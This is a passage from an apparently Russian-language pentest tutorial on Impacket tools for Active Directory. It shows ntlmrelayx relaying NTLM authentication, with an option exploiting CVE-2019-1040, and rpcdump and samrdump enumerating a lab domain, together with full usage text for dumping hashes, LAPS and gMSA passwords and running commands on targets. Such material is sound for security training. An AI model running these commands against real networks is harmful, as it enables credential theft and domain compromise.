Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)  connection:   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. 
This is useful when target is the NetBIOS name and you cannot                         resolve it<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d ntlmrelayx<\/font><\/h3>\n<p>  \u0421\u0442\u0430\u0440\u0442\u0443\u0435\u0442 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0442\u0435\u043b\u044c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u0436\u0434\u043e\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u0435 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u0435 (\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u044b <i>DCSYNC, MSSQL, SMTP, IMAP, IMAPS, HTTP, HTTPS, SMB, RPC, LDAP, LDAPS, HTTP, HTTPS, SMB, MSSQL, IMAP, IMAPS<\/i>) \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0440\u0435\u0442\u0440\u0430\u043d\u0441\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u0443\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0441\u0438\u0441\u0442\u0435\u043c\u0443. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0441\u043a\u0440\u0438\u043f\u0442 \u0438 \u0436\u0434\u0451\u043c \u0441\u043e\u0431\u044b\u0442\u0438\u044f \u0432 \u0441\u0435\u0442\u0438:<\/p>\n<pre><code class=\"bash\">python3 ntlmrelayx.py --target 192.168.1.13 -socks -smb2support -debug  [+] Impacket Library Installation Path: \/usr\/local\/lib\/python3.9\/dist-packages\/impacket [*] Protocol Client DCSYNC loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [+] Protocol Attack HTTP loaded.. [+] Protocol Attack HTTPS loaded.. [+] Protocol Attack SMB loaded.. [+] Protocol Attack MSSQL loaded.. [+] Protocol Attack IMAP loaded.. [+] Protocol Attack IMAPS loaded.. 
[+] Protocol Attack DCSYNC loaded.. [+] Protocol Attack RPC loaded.. [+] Protocol Attack LDAP loaded.. [+] Protocol Attack LDAPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up WCF Server [*] Setting up RAW Server on port 6666  [*] Servers started, waiting for connections <\/code><\/pre>\n<p>  \u0415\u0441\u043b\u0438 \u0432 \u0441\u0435\u0442\u0438 \u043f\u0440\u043e\u0442\u0435\u043a\u0430\u0435\u0442 \u043d\u0443\u0436\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0438 \u0441\u043a\u0440\u0438\u043f\u0442 \u0435\u0451 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u0443\u0435\u0442, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:<\/p>\n<pre><code class=\"bash\">[*] SMBD-Thread-10: Received connection from 192.168.18.13, attacking target smb:\/\/192.168.1.13 [-] Signing is required, attack won't work unless using -remove-target \/ --remove-mic [*] Authenticating against smb:\/\/192.168.1.13 as AD\/RUVDS-PC$ SUCCEED [*] SOCKS: Adding AD\/RUVDS-PC$@192.168.1.13(445) to active SOCKS connection. Enjoy [+] Checking admin status for user AD\/RUVDS-PC$ [+] isAdmin returned: FALSE  socks  Protocol  Target        Username     AdminStatus  Port --------  ------------  -----------  -----------  ---- SMB       192.168.1.13  AD\/RUVDS-PC$  FALSE        445 ntlmrelayx> [+] KeepAlive Timer reached. 
Updating connections [+] Calling keepAlive() for AD\/RUVDS-PC$@192.168.1.13:445 <\/code><\/pre>\n<p>  \u0415\u0441\u043b\u0438 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 <b><font color=\"#3AC1EF\">NTLM Relay<\/font><\/b> \u043d\u0430 LDAPS-\u0441\u0435\u0440\u0432\u0435\u0440, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c <a href=\"https:\/\/dirkjanm.io\/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin\/\">CVE-2019-1040<\/a> \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u0440\u0435\u0434\u044b (\u0438\u043c\u044f \u0438 \u043f\u0430\u0440\u043e\u043b\u044c) \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0441\u043e\u0432\u0441\u0435\u043c \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u044d\u0442\u0430 \u0442\u0435\u043c\u0430 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u043a\u043e\u043b\u043b\u0435\u0433\u0430\u043c\u0438 \u043f\u043e <a href=\"https:\/\/habr.com\/ru\/companies\/otus\/articles\/745942\/\">\u0425\u0430\u0431\u0440\u0443<\/a>):<\/p>\n<pre><code class=\"bash\">python3 ntlmrelayx.py -t ldaps:\/\/192.168.1.13 --remove-mic --delegate-access <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>  
                       <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: ntlmrelayx.py [-h] [-ts] [-debug] [-t TARGET] [-tf TARGETSFILE] [-w]                      [-i] [-ip INTERFACE_IP] [--no-smb-server]                      [--no-http-server] [--no-wcf-server] [--no-raw-server]                      [--smb-port SMB_PORT] [--http-port HTTP_PORT]                      [--wcf-port WCF_PORT] [--raw-port RAW_PORT]                      [--no-multirelay] [-ra] [-r SMBSERVER] [-l LOOTDIR]                      [-of OUTPUT_FILE] [-codec CODEC] [-smb2support]                      [-ntlmchallenge NTLMCHALLENGE] [-socks] [-wh WPAD_HOST]                      [-wa WPAD_AUTH_NUM] [-6] [--remove-mic]                      [--serve-image SERVE_IMAGE] [-c COMMAND] [-e FILE]                      [--enum-local-admins] [-rpc-mode {TSCH}] [-rpc-use-smb]                      [-auth-smb [domain\/]username[:password]]                      [-hashes-smb LMHASH:NTHASH] [-rpc-smb-port {139,445}]                      [-q QUERY] [-machine-account MACHINE_ACCOUNT]                      [-machine-hashes LMHASH:NTHASH] [-domain DOMAIN]                      [-remove-target] [--no-dump] [--no-da] [--no-acl]                      [--no-validate-privs] [--escalate-user ESCALATE_USER]                      [--add-computer [COMPUTERNAME [PASSWORD ...]]]                      [--delegate-access] [--sid] [--dump-laps] [--dump-gmsa]                      [--dump-adcs] [-k KEYWORD] [-m MAILBOX] [-a]                      [-im IMAP_MAX] [--adcs] [--template TEMPLATE]                      [--altname ALTNAME] [--shadow-credentials]                      [--shadow-target SHADOW_TARGET]                      [--pfx-password PFX_PASSWORD] [--export-type {PEM, PFX}]                      [--cert-outfile-path CERT_OUTFILE_PATH]   Main options:   -h, --help            show this help message and exit   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON   
-t TARGET, --target TARGET                         Target to relay the credentials to, can be an IP,                         hostname or URL like domain\\username@host:port                         (domain\\username and port are optional, and don't                         forget to escape the '\\'). If unspecified, it will                         relay back to the client')   -tf TARGETSFILE       File that contains targets by hostname or full URL,                         one per line   -w                    Watch the target file for changes and update target                         list automatically (only valid with -tf)   -i, --interactive     Launch an smbclient or LDAP console insteadof                         executing a command after a successful relay. This                         console will listen locally on a tcp port and can be                         reached with for example netcat.   -ip INTERFACE_IP, --interface-ip INTERFACE_IP                         IP address of interface to bind SMB and HTTP servers   --smb-port SMB_PORT   Port to listen on smb server   --http-port HTTP_PORT                         Port(s) to listen on HTTP server. Can specify multiple                         ports by separating them with `,`, and ranges with                         `-`. Ex: `80,8000-8010`   --wcf-port WCF_PORT   Port to listen on wcf server   --raw-port RAW_PORT   Port to listen on raw server   --no-multirelay       If set, disable multi-host relay (SMB and HTTP                         servers)   -ra, --random         Randomize target selection   -r SMBSERVER          Redirect HTTP requests to a file:\/\/ path on SMBSERVER   -l LOOTDIR, --lootdir LOOTDIR                         Loot directory in which gathered loot such as SAM                         dumps will be stored (default: current directory).   -of OUTPUT_FILE, --output-file OUTPUT_FILE                         base output filename for encrypted hashes. 
Suffixes                         will be added for ntlm and ntlmv2   -codec CODEC          Sets encoding used (codec) from the target's output                         (default \"utf-8\"). If errors are detected, run                         chcp.com at the target, map the result with https:\/\/do                         cs.python.org\/3\/library\/codecs.html#standard-encodings                         and then execute ntlmrelayx.py again with -codec and                         the corresponding codec   -smb2support          SMB2 Support   -ntlmchallenge NTLMCHALLENGE                         Specifies the NTLM server challenge used by the SMB                         Server (16 hex bytes long. eg: 1122334455667788)   -socks                Launch a SOCKS proxy for the connection relayed   -wh WPAD_HOST, --wpad-host WPAD_HOST                         Enable serving a WPAD file for Proxy Authentication                         attack, setting the proxy host to the one supplied.   -wa WPAD_AUTH_NUM, --wpad-auth-num WPAD_AUTH_NUM                         Prompt for authentication N times for clients without                         MS16-077 installed before serving a WPAD file.                         (default=1)   -6, --ipv6            Listen on both IPv6 and IPv4   --remove-mic          Remove MIC (exploit CVE-2019-1040)   --serve-image SERVE_IMAGE                         local path of the image that will we returned to                         clients   -c COMMAND            Command to execute on target system (for SMB and RPC).                         If not specified for SMB, hashes will be dumped                         (secretsdump.py must be in the same directory). For                         RPC no output will be provided.    
--no-smb-server       Disables the SMB server   --no-http-server      Disables the HTTP server   --no-wcf-server       Disables the WCF server   --no-raw-server       Disables the RAW server  SMB client options:   -e FILE               File to execute on the target system. If not                         specified, hashes will be dumped (secretsdump.py must                         be in the same directory)   --enum-local-admins   If relayed user is not admin, attempt SAMR lookup to                         see who is (only works pre Win 10 Anniversary)  RPC client options:   -rpc-mode {TSCH}      Protocol to attack, only TSCH supported   -rpc-use-smb          Relay DCE\/RPC to SMB pipes   -auth-smb [domain\/]username[:password]                         Use this credential to authenticate to SMB (low-                         privilege account)   -hashes-smb LMHASH:NTHASH   -rpc-smb-port {139,445}                         Destination port to connect to SMB  MSSQL client options:   -q QUERY, --query QUERY                         MSSQL query to execute(can specify multiple)  HTTP options:   -machine-account MACHINE_ACCOUNT                         Domain machine account to use when interacting with                         the domain to grab a session key for signing, format                         is domain\/machine_name   -machine-hashes LMHASH:NTHASH                         Domain machine hashes, format is LMHASH:NTHASH   -domain DOMAIN        Domain FQDN or IP to connect using NETLOGON   -remove-target        Try to remove the target in the challenge message (in                         case CVE-2019-1019 patch is not installed)  LDAP client options:   --no-dump             Do not attempt to dump LDAP information   --no-da               Do not attempt to add a Domain Admin   --no-acl              Disable ACL attacks   --no-validate-privs   Do not attempt to enumerate privileges, assume                         permissions are granted to escalate a user via ACL              
           attacks   --escalate-user ESCALATE_USER                         Escalate privileges of this user instead of creating a                         new one   --add-computer [COMPUTERNAME [PASSWORD ...]]                         Attempt to add a new computer account   --delegate-access     Delegate access on relayed computer account to the                         specified account   --sid                 Use a SID to delegate access rather than an account                         name   --dump-laps           Attempt to dump any LAPS passwords readable by the                         user   --dump-gmsa           Attempt to dump any gMSA passwords readable by the                         user   --dump-adcs           Attempt to dump ADCS enrollment services and                         certificate templates info  IMAP client options:   -k KEYWORD, --keyword KEYWORD                         IMAP keyword to search for. If not specified, will                         search for mails containing \"password\"   -m MAILBOX, --mailbox MAILBOX                         Mailbox name to dump. Default: INBOX   -a, --all             Instead of searching for keywords, dump all emails   -im IMAP_MAX, --imap-max IMAP_MAX                         Max number of emails to dump (0 = unlimited, default:                         no limit)  AD CS attack options:   --adcs                Enable AD CS relay attack   --template TEMPLATE   AD CS template. Defaults to Machine or User whether                         relayed account name ends with `$`. Relaying a DC                         should require specifying `DomainController`   --altname ALTNAME     Subject Alternative Name to use when performing ESC1                         or ESC6 attacks.  
Shadow Credentials attack options:   --shadow-credentials  Enable Shadow Credentials relay attack (msDS-                         KeyCredentialLink manipulation for PKINIT pre-                         authentication)   --shadow-target SHADOW_TARGET                         target account (user or computer$) to populate msDS-                         KeyCredentialLink from   --pfx-password PFX_PASSWORD                         password for the PFX stored self-signed certificate                         (will be random if not set, not needed when exporting                         to PEM)   --export-type {PEM, PFX}                         choose to export cert+private key in PEM or PFX (i.e.                         #PKCS12) (default: PFX))   --cert-outfile-path CERT_OUTFILE_PATH                         filename to store the generated self-signed PEM or PFX                         certificate and key<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d rpcdump<\/font><\/h3>\n<p>  \u0421\u043a\u0440\u0438\u043f\u0442 \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e\u0431 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0445 \u0442\u043e\u0447\u043a\u0430\u0445 <i>RPC<\/i>. 
\u0417\u0430 \u043a\u0430\u0436\u0434\u043e\u0439 \u0438\u0437 \u043d\u0438\u0445 \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0441\u0432\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0438\u043b\u0438 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u0430\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 <i>DLL<\/i>:<\/p>\n<pre><code class=\"bash\">python3 rpcdump.py admin:password@192.168.1.13  [*] Retrieving endpoint list from 192.168.1.13 Protocol: [MS-RSP]: Remote Shutdown Protocol Provider: wininit.exe UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 Bindings:           ncacn_ip_tcp:192.168.1.13[49664]           ncalrpc:[WindowsShutdown]           ncacn_np:\\\\WIN-LIELOSOD7LK[\\PIPE\\InitShutdown]           ncalrpc:[WMsgKRpc068A60]  Protocol: N\/A Provider: winlogon.exe UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 Bindings:           ncalrpc:[WindowsShutdown]           ncacn_np:\\\\WIN-LIELOSOD7LK[\\PIPE\\InitShutdown]           ncalrpc:[WMsgKRpc068A60]           ncalrpc:[WMsgKRpc069221]           ncalrpc:[WMsgKRpc04BFBAD2] ...  [*] Received 458 endpoints. 
<\/code><\/pre>\n<p>  \u0412\u044b\u0432\u043e\u0434 \u0431\u0443\u0434\u0435\u0442 \u0433\u0440\u043e\u043c\u043e\u0437\u0434\u043a\u0438\u043c, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0438\u0441\u043a\u0430\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0446\u0435\u043b\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0443 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0435\u0439 \u0441\u043b\u0443\u0436\u0431\u044b <i>Print System Remote Protocol<\/i>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438:<\/p>\n<pre><code class=\"bash\">rpcdump.py @192.168.1.10 | grep MS-RPRN  Protocol: [MS-RPRN]: Print System Remote Protocol <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: rpcdump.py [-h] [-debug] [-target-ip ip address] [-port [destination port]] [-hashes LMHASH:NTHASH] target   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>  optional arguments:   -h, --help            show this help message and exit   -debug                Turn DEBUG output ON  connection:   -target-ip ip address                         IP Address of the target machine. If ommited it will use whatever was specified as target. 
This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to RPC Endpoint Mapper  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d samrdump<\/font><\/h3>\n<p>  \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. \u0410\u0442\u0440\u0438\u0431\u0443\u0442 <a href=\"https:\/\/learn.microsoft.com\/ru-ru\/windows\/win32\/adschema\/a-uid\">UID<\/a> 5xx \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0438\u043d\u0442\u0435\u0433\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 (\u043f\u0440\u0435\u0434\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0435) \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 Windows Server. <i>Ruvds, test \u0438 admin<\/i> \u2014 \u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430. \u041f\u043e\u0440\u044f\u0434\u043e\u043a \u0432\u043e\u0437\u0440\u0430\u0441\u0442\u0430\u043d\u0438\u044f UID \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u043e\u0447\u0435\u0440\u0451\u0434\u043d\u043e\u0441\u0442\u044c\u044e \u0438\u0445 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f. 
\u041a\u0440\u043e\u043c\u0435 \u044d\u0442\u043e\u0433\u043e, \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043c\u043d\u043e\u0433\u043e \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438: UserComment, <a href=\"https:\/\/learn.microsoft.com\/bs-latn-ba\/windows\/win32\/adschema\/a-primarygroupid\">PrimaryGroupId<\/a>, <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/adschema\/a-badpwdcount\">BadPasswordCount<\/a>, <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/adschema\/a-logoncount\">LogonCount<\/a>, <a href=\"https:\/\/learn.microsoft.com\/ru-ru\/windows\/win32\/adschema\/a-pwdlastset\">PasswordLastSet<\/a>, <a href=\"https:\/\/learn.microsoft.com\/en-us\/microsoft-365\/admin\/add-users\/set-password-to-never-expire?view=o365-worldwide\">PasswordDoesNotExpire<\/a>, <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/adschema\/a-msds-useraccountdisabled\">AccountIsDisabled<\/a>, <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/adschema\/a-scriptpath\">ScriptPath<\/a>:<\/p>\n<pre><code class=\"bash\">python3 samrdump.py admin:password@192.168.1.13  Found domain(s):  . AD  . 
Builtin [*] Looking up users in domain AD Found user: \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440, uid = 500 Found user: \u0413\u043e\u0441\u0442\u044c, uid = 501 Found user: krbtgt, uid = 502 Found user: Ruvds, uid = 1107 Found user: test, uid = 1112 Found user: admin, uid = 1114 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/FullName: \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/UserComment: \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/PrimaryGroupId: 513 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/BadPasswordCount: 4 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/LogonCount: 220 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/PasswordLastSet: 2022-07-03 21:47:50.410770 \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/PasswordDoesNotExpire: True \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/AccountIsDisabled: False \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440 (500)\/ScriptPath: \u0413\u043e\u0441\u0442\u044c (501)\/FullName: \u0413\u043e\u0441\u0442\u044c (501)\/UserComment: \u0413\u043e\u0441\u0442\u044c (501)\/PrimaryGroupId: 514 \u0413\u043e\u0441\u0442\u044c (501)\/BadPasswordCount: 0 \u0413\u043e\u0441\u0442\u044c (501)\/LogonCount: 0 \u0413\u043e\u0441\u0442\u044c (501)\/PasswordLastSet: &lt;never> \u0413\u043e\u0441\u0442\u044c (501)\/PasswordDoesNotExpire: True \u0413\u043e\u0441\u0442\u044c (501)\/AccountIsDisabled: True \u0413\u043e\u0441\u0442\u044c (501)\/ScriptPath: krbtgt (502)\/FullName: krbtgt (502)\/UserComment: krbtgt (502)\/PrimaryGroupId: 513 krbtgt (502)\/BadPasswordCount: 0 krbtgt (502)\/LogonCount: 0 krbtgt (502)\/PasswordLastSet: 2022-07-21 11:57:31.728056 
krbtgt (502)\/PasswordDoesNotExpire: False krbtgt (502)\/AccountIsDisabled: True krbtgt (502)\/ScriptPath: Ruvds (1107)\/FullName: Ru Vds Ruvds (1107)\/UserComment: Ruvds (1107)\/PrimaryGroupId: 513 Ruvds (1107)\/BadPasswordCount: 0 Ruvds (1107)\/LogonCount: 21 Ruvds (1107)\/PasswordLastSet: 2022-08-24 22:12:13.125652 Ruvds (1107)\/PasswordDoesNotExpire: True Ruvds (1107)\/AccountIsDisabled: False Ruvds (1107)\/ScriptPath: test (1112)\/FullName: Test_Name Test_Surname test (1112)\/UserComment: test (1112)\/PrimaryGroupId: 513 test (1112)\/BadPasswordCount: 0 test (1112)\/LogonCount: 2 test (1112)\/PasswordLastSet: 2023-01-12 20:56:06.969165 test (1112)\/PasswordDoesNotExpire: True test (1112)\/AccountIsDisabled: False test (1112)\/ScriptPath: admin (1114)\/FullName: Admin AdminFemale admin (1114)\/UserComment: admin (1114)\/PrimaryGroupId: 513 admin (1114)\/BadPasswordCount: 0 admin (1114)\/LogonCount: 1 admin (1114)\/PasswordLastSet: 2023-01-24 20:05:11.514038 admin (1114)\/PasswordDoesNotExpire: True admin (1114)\/AccountIsDisabled: False admin (1114)\/ScriptPath: [*] Received 6 entries. 
<\/code><\/pre>\n<p>  \u0412 \u0432\u044b\u0432\u043e\u0434\u0435 \u0432\u0438\u0434\u0435\u043d \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u0434\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438, \u0432 \u043a\u0430\u043a\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u043e\u043d\u0430 \u0432\u0445\u043e\u0434\u0438\u0442, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0432\u043e\u0434\u0430 \u043f\u0430\u0440\u043e\u043b\u044f, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u0445\u043e\u0434\u043e\u0432 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043e\u043c\u0435\u043d\u0430, \u0434\u0430\u0442\u0430 \u0438 \u0432\u0440\u0435\u043c\u044f, \u043a\u043e\u0433\u0434\u0430 \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u043b\u0441\u044f \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0440\u0430\u0437, \u043f\u0440\u043e\u0442\u0443\u0445\u0430\u0435\u0442 \u043b\u0438 \u043f\u0430\u0440\u043e\u043b\u044c \u0438\u043b\u0438 \u043d\u0435\u0442, \u0430\u043a\u0442\u0438\u0432\u043d\u0430 \u043b\u0438 \u0443\u0447\u0451\u0442\u043a\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0443\u0442\u044c \u0434\u043e \u0441\u043a\u0440\u0438\u043f\u0442\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d \u043f\u0440\u0438 \u0432\u0445\u043e\u0434\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f 
(\u0435\u0441\u043b\u0438 \u0442\u0430\u043a\u043e\u0439 \u0438\u043c\u0435\u0435\u0442\u0441\u044f). \u0412\u044b\u0432\u043e\u0434 \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u043a\u0430\u043d\u0434\u0438\u0434\u0430\u0442\u043e\u0432 \u0432 <a href=\"https:\/\/pswalia2u.medium.com\/creating-and-configuring-a-honeypot-account-in-active-directory-94153385275d\">honeypot<\/a>.<\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: samrdump.py [-h] [-csv] [-ts] [-debug] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]                    target   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>  optional arguments:   -h, --help            show this help message and exit   -csv                  Turn CSV output   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  connection:   -dc-ip ip address     IP Address 